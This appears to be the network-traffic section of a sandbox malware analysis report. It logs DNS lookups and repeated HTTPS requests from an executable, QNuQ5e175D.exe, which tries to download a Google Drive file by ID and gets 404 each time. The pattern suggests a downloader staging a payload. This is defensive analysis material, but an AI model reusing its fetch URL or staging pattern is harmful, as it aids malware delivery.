                                                      Jan 11, 2025 05:07:16.328386068 CET50047443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:16.328448057 CET44350047142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:16.328520060 CET50047443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:16.328810930 CET50047443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:16.328829050 CET44350047142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:16.977092028 CET44350047142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:16.977241039 CET50047443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:16.977818012 CET50047443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:16.977833033 CET44350047142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:16.978028059 CET50047443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:16.978034973 CET44350047142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:17.406158924 CET44350047142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:17.406234026 CET44350047142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:17.406301022 CET44350047142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:17.406310081 CET50047443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:17.406363010 CET50047443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:17.407238007 CET50047443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:17.407270908 CET44350047142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:17.522890091 CET50048443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:17.522975922 CET44350048172.217.16.142192.168.2.11
                                                      Jan 11, 2025 05:07:17.523077965 CET50048443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:17.523438931 CET50048443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:17.523448944 CET44350048172.217.16.142192.168.2.11
                                                      Jan 11, 2025 05:07:18.179267883 CET44350048172.217.16.142192.168.2.11
                                                      Jan 11, 2025 05:07:34.055347919 CET44350062172.217.16.142192.168.2.11
                                                      Jan 11, 2025 05:07:34.395371914 CET44350062172.217.16.142192.168.2.11
                                                      Jan 11, 2025 05:07:34.395617008 CET50062443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:34.395802975 CET50062443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:34.395812035 CET44350062172.217.16.142192.168.2.11
                                                      Jan 11, 2025 05:07:34.395888090 CET50062443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:34.396629095 CET50063443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:34.396678925 CET44350063142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:34.396740913 CET50063443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:34.396953106 CET50063443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:34.396967888 CET44350063142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:35.060009003 CET44350063142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:35.060306072 CET50063443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:35.060724974 CET50063443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:35.060755014 CET44350063142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:35.060897112 CET50063443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:35.060909986 CET44350063142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:35.484339952 CET44350063142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:35.484442949 CET50063443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:35.484517097 CET44350063142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:35.484555006 CET44350063142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:35.484582901 CET50063443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:35.484606028 CET44350063142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:35.484631062 CET50063443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:35.484657049 CET50063443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:35.484668970 CET44350063142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:35.484714985 CET50063443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:35.484757900 CET44350063142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:35.484818935 CET50063443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:35.485153913 CET50063443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:35.485188961 CET44350063142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:35.605474949 CET50064443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:35.605520010 CET44350064172.217.16.142192.168.2.11
                                                      Jan 11, 2025 05:07:35.605587959 CET50064443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:35.606383085 CET50064443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:35.606400013 CET44350064172.217.16.142192.168.2.11
                                                      Jan 11, 2025 05:07:36.242197037 CET44350064172.217.16.142192.168.2.11
                                                      Jan 11, 2025 05:07:36.242263079 CET50064443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:36.242655039 CET50064443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:36.242662907 CET44350064172.217.16.142192.168.2.11
                                                      Jan 11, 2025 05:07:36.242824078 CET50064443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:36.242830038 CET44350064172.217.16.142192.168.2.11
                                                      Jan 11, 2025 05:07:36.634720087 CET44350064172.217.16.142192.168.2.11
                                                      Jan 11, 2025 05:07:36.635363102 CET50064443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:36.635404110 CET44350064172.217.16.142192.168.2.11
                                                      Jan 11, 2025 05:07:36.635456085 CET50064443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:36.635464907 CET50064443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:36.635618925 CET50064443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:36.635679007 CET44350064172.217.16.142192.168.2.11
                                                      Jan 11, 2025 05:07:36.635736942 CET50064443192.168.2.11172.217.16.142
                                                      Jan 11, 2025 05:07:36.636457920 CET50065443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:36.636504889 CET44350065142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:36.636574030 CET50065443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:36.636859894 CET50065443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:36.636878014 CET44350065142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:37.270600080 CET44350065142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:37.270708084 CET50065443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:37.271167994 CET50065443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:37.271178007 CET44350065142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:37.271317959 CET50065443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:37.271322966 CET44350065142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:37.684055090 CET44350065142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:37.684117079 CET50065443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:37.684132099 CET44350065142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:37.684145927 CET44350065142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:37.684175968 CET50065443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:37.684181929 CET44350065142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:37.684195995 CET50065443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:37.684216022 CET44350065142.250.184.225192.168.2.11
                                                      Jan 11, 2025 05:07:37.684225082 CET50065443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:37.684252977 CET50065443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:37.684897900 CET50065443192.168.2.11142.250.184.225
                                                      Jan 11, 2025 05:07:37.684915066 CET44350065142.250.184.225192.168.2.11
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 11, 2025 05:05:59.908541918 CET | 63438 | 53 | 192.168.2.11 | 1.1.1.1
Jan 11, 2025 05:05:59.916207075 CET | 53 | 63438 | 1.1.1.1 | 192.168.2.11
Jan 11, 2025 05:06:01.088660002 CET | 63136 | 53 | 192.168.2.11 | 1.1.1.1
Jan 11, 2025 05:06:01.096187115 CET | 53 | 63136 | 1.1.1.1 | 192.168.2.11
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 11, 2025 05:05:59.908541918 CET | 192.168.2.11 | 1.1.1.1 | 0x7ed9 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Jan 11, 2025 05:06:01.088660002 CET | 192.168.2.11 | 1.1.1.1 | 0xbc44 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 11, 2025 05:05:59.916207075 CET | 1.1.1.1 | 192.168.2.11 | 0x7ed9 | No error (0) | drive.google.com |  | 172.217.16.142 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 05:06:01.096187115 CET | 1.1.1.1 | 192.168.2.11 | 0xbc44 | No error (0) | drive.usercontent.google.com |  | 142.250.184.225 | A (IP address) | IN (0x0001) | false
                                                      • drive.google.com
                                                      • drive.usercontent.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.11 | 49854 | 172.217.16.142 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:06:00 UTC | 216 | OUT | GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
2025-01-11 04:06:01 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:00 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-iOdLH1KEpN8KkTv1tip9_Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.11 | 49860 | 142.250.184.225 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:06:01 UTC | 258 | OUT | GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
2025-01-11 04:06:02 UTC | 2225 | IN | HTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgTTdXpZSXlwSiAzrjMhkKapMak9eF3AaveGf_RYft8RZNr2coBwVTLIJw74yCojNBRL
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:02 GMT
                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy: script-src 'nonce-DeDfnxsw2JoCIImyO2KlWg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Set-Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ; expires=Sun, 13-Jul-2025 04:06:01 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
2025-01-11 04:06:02 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="1l1XnvGXOqsrXG2tViuPkw">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.11 | 49871 | 172.217.16.142 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:06:03 UTC | 424 | OUT | GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
2025-01-11 04:06:03 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:03 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: script-src 'nonce-a2aXiHs4L7uSZ_1aouDpEg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.11 | 49881 | 142.250.184.225 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:06:04 UTC | 466 | OUT | GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
2025-01-11 04:06:04 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgQ7Oj6XiMKPrNThbbNvGLq5Ji9066ekkRbzA-wvmisqifUl2t9TUFrdvfYOw4MHfun1
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:04 GMT
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-nBZbLe45NRVS_eqPGpPZ1w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
2025-01-11 04:06:04 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jbrz6DIlVuNmTsdfX6Mdsg">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.11 | 49888 | 172.217.16.142 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:06:05 UTC | 424 | OUT | GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:06 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:05 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-mo6H5axHd-m66avLdY27EQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      5 | 192.168.2.11 | 49899 | 142.250.184.225 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:06:06 UTC | 466 | OUT | GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:07 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgSz4JJ8K40AwlCuQSzhm6caGWtikNTIeyWkUYW7zGpeC5SgjT1D6Cx_r_j1CAEmdpAn
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:07 GMT
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: script-src 'nonce-QIqOKJo2_cz0vSGF6AadGw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
